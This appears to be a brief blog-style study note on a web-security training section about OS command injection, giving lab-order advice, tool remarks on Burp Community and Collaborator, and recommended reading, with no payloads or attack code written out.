Another quick section – I would do this section second (after the Directory Traversal section). The content and labs were closely matched again – the only caveat to that would be that you should really scroll down to the bottom section covering ways of injecting OS commands before going to the labs. The first part only introduces
& as a method of command injection and the additional methods covered will be really helpful.
Approach to command injection is similar – test all the things, try different options, and automate where possible. Outside of the labs, you would want to try different payloads to see what’s there. The labs are very doable with the Community version. Where Burp Collaborator is used, you can do the interaction portion by using a dummy URL, but you can’t do the exfiltration portion.
Scripting was important for me for these labs. They gave me the opportunity to figure out some additional things with Python (looping through dictionaries, tweaking values, and reverting them). Looking toward real-world usage of the script, I also figured out how to build dictionaries on the fly based on user input. Not the most secure practice, but it served a purpose.
Definitely take a look at the associated chapter in the Web Application Hacker’s Handbook if you have it as well as the OWASP Command Injection. Otherwise, get through this section and move on.